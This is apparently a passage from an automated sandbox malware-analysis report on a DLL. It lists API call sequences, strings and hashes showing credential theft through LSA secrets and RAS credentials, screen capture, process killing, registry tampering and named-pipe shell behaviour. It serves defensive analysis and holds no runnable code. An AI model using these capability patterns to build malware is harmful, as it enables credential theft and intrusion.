                                                  • lstrlenA.KERNEL32(?), ref: 10007493
                                                  • LocalReAlloc.KERNEL32(00000000,-00000002,00000042), ref: 100074A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$File$AllocLocal$AttributesCloseCreateFolderHandlePathReadSizeSpecialfreemalloc
                                                  • String ID: Version
                                                  • API String ID: 2101459175-1889659487
                                                  • Opcode ID: 2247f92c777c14eff78654b7276251a4fefb10210063c3daf73eb663d2b26340
                                                  • Instruction ID: 83b2c9fbb4ddd666ab596bed14113dd1762a442ba6db59ffbdd1d5f5b3623690
                                                  • Opcode Fuzzy Hash: 2247f92c777c14eff78654b7276251a4fefb10210063c3daf73eb663d2b26340
                                                  • Instruction Fuzzy Hash: 1A61C5756002045BE728DB78CC99BEB3795FB88310F584B2DFE1ADB2D5DB74AA04C660
                                                  APIs
                                                  • #2614.MFC42(00000000,?), ref: 100110F5
                                                  • #2614.MFC42(00000000,?), ref: 100110FD
                                                  • #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                  • #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                    • Part of subcall function 10012190: #825.MFC42(?,00000000,?,?,?,1001112D,00000000,000000FF,00000000,000000FF,00000000,?), ref: 100121D1
                                                  • #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                  • PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                  • #860.MFC42(00000000), ref: 1001117C
                                                  • PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                  • PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                  • _splitpath.MSVCRT ref: 100111C5
                                                  • #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                  • #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                  • #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                  • #858.MFC42 ref: 10011237
                                                  • #800.MFC42 ref: 1001124A
                                                  • #941.MFC42(?), ref: 10011259
                                                  • #858.MFC42 ref: 1001127E
                                                  • #800.MFC42 ref: 1001128E
                                                  • #860.MFC42(?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112A0
                                                  • #860.MFC42(?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112BE
                                                  • #6874.MFC42(0000002E,?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112C7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #860$#2614Path$#800#858Args$#6143#6874#6876#825#941RemoveSpacesUnquote_splitpath
                                                  • String ID:
                                                  • API String ID: 2691293456-0
                                                  • Opcode ID: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                  • Instruction ID: c1f90ecbaa6655960492b8b6f0b929a9783f598dd6715e5503ef59e830b1600e
                                                  • Opcode Fuzzy Hash: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                  • Instruction Fuzzy Hash: 9451C3792043459BC728CF64D951FEEB7E9EF88710F40461CF55A872C1DB70A609CB96
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1000590A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                  • LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                  • LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                  • free.MSVCRT ref: 10005993
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$free
                                                  • String ID: .23$2$3$D$I$L$_RasDefaultCredentials#0$LsaClose$LsaOpenPolicy$LsaRetrievePrivateData$P$V
                                                  • API String ID: 1540231353-1695543321
                                                  • Opcode ID: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                  • Instruction ID: b87623f99a44c4d79927182bb7b3290fde75b39c0de0aa94dcbdadddc74f4482
                                                  • Opcode Fuzzy Hash: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                  • Instruction Fuzzy Hash: 1A3192B610C3859ED300DB68DC84AABBBD8EBD4254F44491EF988D7241E675DA0DCBA3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseDeleteFreeLocalOpenwsprintf
                                                  • String ID: D$N$U$a$a$i$m$m$o$o$r$t$u
                                                  • API String ID: 321629408-3882932831
                                                  • Opcode ID: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                  • Instruction ID: 9e633f2ff59cbc2020f784f894622fe3b489b46e50fdb71083fa3736798a3e6b
                                                  • Opcode Fuzzy Hash: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                  • Instruction Fuzzy Hash: 4941256610E3C1DED302CB689484A8BBFD56BB6608F48499DF4C857342C6A9C61CC7BB
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                  • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                  • RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Value$AddressDeleteLibraryLoadProc
                                                  • String ID: A$ADVAPI32.dll$E$ExA$K$RegCrkat$RegOpenKeyExA$x$y
                                                  • API String ID: 839562100-350676929
                                                  • Opcode ID: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                  • Instruction ID: 1ed5652b7448f0d279fc009ec0fc7650b7380c8c77e483b0f181bc9d886ff7ae
                                                  • Opcode Fuzzy Hash: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                  • Instruction Fuzzy Hash: 60516F71A04289AEDB00DBA8CC84FEF7BB8EB99754F054109F604AB291DB74E940CB60
                                                  APIs
                                                  • #540.MFC42 ref: 1000A14F
                                                  • #540.MFC42 ref: 1000A163
                                                  • #860.MFC42(00000000), ref: 1000A1B1
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011005
                                                    • Part of subcall function 10010FD0: #825.MFC42(?), ref: 10011044
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 1001105A
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011067
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011074
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 10011081
                                                    • Part of subcall function 10010FD0: #801.MFC42 ref: 1001108E
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 1001109B
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 100110A8
                                                    • Part of subcall function 10010FD0: #800.MFC42 ref: 100110B8
                                                  • lstrcpyA.KERNEL32(?,?,00000000), ref: 1000A1DA
                                                  • CreateFileA.KERNEL32(?,00000008,00000001,00000000,00000003,00000000,00000000), ref: 1000A1ED
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 1000A1FD
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000A20B
                                                  • PathFindFileNameA.SHLWAPI(?), ref: 1000A216
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1000A225
                                                  • GetFileAttributesExA.KERNEL32(?,00000000,?), ref: 1000A233
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 1000A243
                                                  • wsprintfA.USER32 ref: 1000A276
                                                  • #823.MFC42(0000022E), ref: 1000A281
                                                  • Sleep.KERNEL32(0000000A), ref: 1000A2B1
                                                  • #800.MFC42 ref: 1000A2C5
                                                  • #800.MFC42 ref: 1000A2D9
                                                    • Part of subcall function 10011EC0: #858.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011EF8
                                                    • Part of subcall function 10011EC0: #800.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011F09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #800$File$#540Timelstrcpy$#801#823#825#858#860AttributesCloseCreateFindHandleNamePathSizeSleepSystemwsprintf
                                                  • String ID: %d-%d-%d
                                                  • API String ID: 4162832437-1067691376
                                                  • Opcode ID: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                  • Instruction ID: e65afb7b552d62d436e06514f25d1dc28ad07c56c8aeeae503be500a7d4ecf2d
                                                  • Opcode Fuzzy Hash: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                  • Instruction Fuzzy Hash: 67419079148382ABE324DB64CC49FAFB7A8FF85700F044A2CF599972D1CB74A544CB62
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,ReadFile), ref: 10021ECA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021ED3
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,LocalAlloc), ref: 10021EE3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021EE6
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,LocalFree), ref: 10021EF6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021EF9
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,Sleep), ref: 10021F09
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021F0C
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,PeekNamedPipe), ref: 10021F1C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021F1F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: KERNEL32.dll$LocalAlloc$LocalFree$PeekNamedPipe$ReadFile$Sleep$kernel32.dll
                                                  • API String ID: 2574300362-1218197485
                                                  • Opcode ID: db3c6ffe9c2453a1131e68fd2b8d6cef7e6288d4bf9072ecd034f117ac42ecc1
                                                  • Instruction ID: dd281816244d95a183e11c8b804c49a018b3967d0145ae836d24216adbf5599a
                                                  • Opcode Fuzzy Hash: db3c6ffe9c2453a1131e68fd2b8d6cef7e6288d4bf9072ecd034f117ac42ecc1
                                                  • Instruction Fuzzy Hash: 3C310BB1614349ABD714EFB1CD49F9B7AE8EFC8744F40092DB684AB140DB74E904CBA6
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32 ref: 1001A292
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001A299
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: G$I$N$S$a$f$i$kernel32.dll$m$n$o$s$v$y
                                                  • API String ID: 1646373207-3978980583
                                                  • Opcode ID: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                  • Instruction ID: bfef907bca7166945bb8c4c048d14843ea41578d74aef9e94cfa9c66aad3b8c8
                                                  • Opcode Fuzzy Hash: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                  • Instruction Fuzzy Hash: 18111C1050C3C28EE302DB6C844838FBFD55BA2644F48888DF4D84A293D2BAC69CC7B7
                                                  APIs
                                                  • LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                    • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                    • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                    • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                  • GetDesktopWindow.USER32 ref: 10018B62
                                                  • GetDC.USER32(00000000), ref: 10018B6F
                                                  • GetTickCount.KERNEL32 ref: 10018B83
                                                  • GetSystemMetrics.USER32(00000000), ref: 10018BAD
                                                  • GetSystemMetrics.USER32(00000001), ref: 10018BB4
                                                  • CreateCompatibleDC.GDI32(?), ref: 10018BD2
                                                  • CreateCompatibleDC.GDI32(?), ref: 10018BDB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 10018BE4
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 10018BEA
                                                  • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10018C49
                                                  • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 10018C5A
                                                  • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 10018C6E
                                                  • SelectObject.GDI32(?,?), ref: 10018C84
                                                  • SelectObject.GDI32(?,?), ref: 10018C8E
                                                  • SelectObject.GDI32(?,?), ref: 10018C9E
                                                  • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 10018CAE
                                                  • #823.MFC42(00000002), ref: 10018CBD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$#823CountCursorLoadRectReleaseTick
                                                  • String ID:
                                                  • API String ID: 704209761-0
                                                  • Opcode ID: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                  • Instruction ID: b86d6b879deca8f43264229754a3adc1f6ec2cd8ec19f7890218ae82cecf81d1
                                                  • Opcode Fuzzy Hash: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                  • Instruction Fuzzy Hash: 2E81F3B4504B459FD320DF69C884A67FBE9FB88704F004A1DE59A87750DBB9F805CBA1
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                  • Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                  • #4202.MFC42(00000000), ref: 1000BC03
                                                  • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                  • #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                  • #4202.MFC42 ref: 1000BC35
                                                  • #5572.MFC42(000000FF), ref: 1000BC78
                                                  • #800.MFC42(000000FF), ref: 1000BC88
                                                  • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                  • #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                  • #800.MFC42 ref: 1000BCC0
                                                  • OpenProcess.KERNEL32(00000001,00000000,00000128), ref: 1000BCE7
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000BCF1
                                                  • CloseHandle.KERNEL32(00000000), ref: 1000BCF8
                                                  • #5572.MFC42(000000FF), ref: 1000BD04
                                                  • #5572.MFC42(000000FF,000000FF), ref: 1000BD12
                                                  • #800.MFC42(000000FF,000000FF), ref: 1000BD22
                                                  • #800.MFC42(000000FF,000000FF), ref: 1000BD39
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #5572#800$Process32$#4202NextProcess$#537CloseCreateFirstHandleOpenSnapshotTerminateToolhelp32
                                                  • String ID:
                                                  • API String ID: 1944864456-0
                                                  • Opcode ID: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                  • Instruction ID: ee7fe5d149508e1b0384bfe3d7b9a40c8a8a5284b934431346b927ad99a76550
                                                  • Opcode Fuzzy Hash: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                  • Instruction Fuzzy Hash: 18417F350083859FE360DF64C891EEFB7D9EF953A0F944B2DF4A9421E1EB34A908C652
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                  • strrchr.MSVCRT ref: 1001D8C3
                                                  • strrchr.MSVCRT ref: 1001D904
                                                  • isdigit.MSVCRT ref: 1001D93C
                                                  • memmove.MSVCRT(?,?), ref: 1001D95D
                                                  • atoi.MSVCRT(?), ref: 1001D995
                                                  • sprintf.MSVCRT ref: 1001D9B9
                                                    • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                  • sprintf.MSVCRT ref: 1001D9E3
                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 1001DA13
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001DA23
                                                  • printf.MSVCRT ref: 1001DA36
                                                  • printf.MSVCRT ref: 1001DA50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
